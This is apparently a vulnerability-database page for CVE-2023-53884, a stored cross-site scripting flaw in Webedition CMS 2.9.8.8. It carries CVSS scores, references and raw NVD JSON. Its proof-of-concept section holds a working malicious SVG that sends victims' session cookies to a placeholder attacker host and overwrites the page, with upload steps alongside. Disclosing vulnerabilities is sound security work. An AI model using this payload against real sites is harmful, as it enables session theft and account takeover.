CVE-2023-53884

Description

Webedition CMS v2.9.8.8 contains a stored cross-site scripting vulnerability that allows authenticated users to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG files through the media upload feature to inject and execute arbitrary scripts when the file is viewed by other users.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:webedition:webedition_cms:2.9.8.8:*:*:*:*:*:*:* - VULNERABLE

Webedition CMS v2.9.8.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Malicious SVG file for CVE-2023-53884 PoC -->
<!-- This PoC demonstrates stored XSS via SVG upload in Webedition CMS -->

<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <script type="text/javascript">
    // Steal session cookies and send to attacker server
    var cookies = document.cookie;
    var attacker_server = "https://attacker.example.com/steal?data=" + encodeURIComponent(cookies);
    
    // Create image element to exfiltrate data
    var img = new Image();
    img.src = attacker_server;
    
    // Display alert for PoC demonstration
    alert('XSS Executed - CVE-2023-53884\nCookie: ' + cookies);
    
    // Additional payload: DOM manipulation
    document.body.innerHTML = '<h1>Malicious SVG Executed</h1><p>Your session has been compromised.</p>';
  </script>
  
  <!-- Visual element to make SVG appear legitimate -->
  <rect width="300" height="200" fill="#f0f0f0" stroke="#333" stroke-width="2"/>
  <text x="150" y="100" text-anchor="middle" font-family="Arial" font-size="16" fill="#333">
    Malicious SVG File
  </text>
</svg>

<!-- Usage: -->
<!-- 1. Obtain low-privilege account on Webedition CMS -->
<!-- 2. Navigate to media upload functionality -->
<!-- 3. Upload this SVG file -->
<!-- 4. When other users view the SVG, the JavaScript executes -->
<!-- 5. Attacker receives victim's cookies via the defined endpoint -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53884
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53884
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53884/
[4] VulDB https://vuldb.com/cve/CVE-2023-53884
[5] https://www.exploit-db.com/exploits/51662
[6] https://www.vulncheck.com/advisories/webedition-cms-v-stored-cross-site-scripting-via-svg-upload
[7] https://www.webedition.org/
[8] https://www.exploit-db.com/exploits/51662

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53884", "sourceIdentifier": "[email protected]", "published": "2025-12-15T21:15:51.420", "lastModified": "2025-12-18T21:44:29.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Webedition CMS v2.9.8.8 contains a stored cross-site scripting vulnerability that allows authenticated users to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG files through the media upload feature to inject and execute arbitrary scripts when the file is viewed by other users."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webedition:webedition_cms:2.9.8.8:*:*:*:*:*:*:*", "matchCriteriaId": "A7A06534-7ECF-4DC7-BCF2-EAD8F9519E7B"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51662", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/webedition-cms-v-stored-cross-site-scripting-via-svg-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.webedition.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51662", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}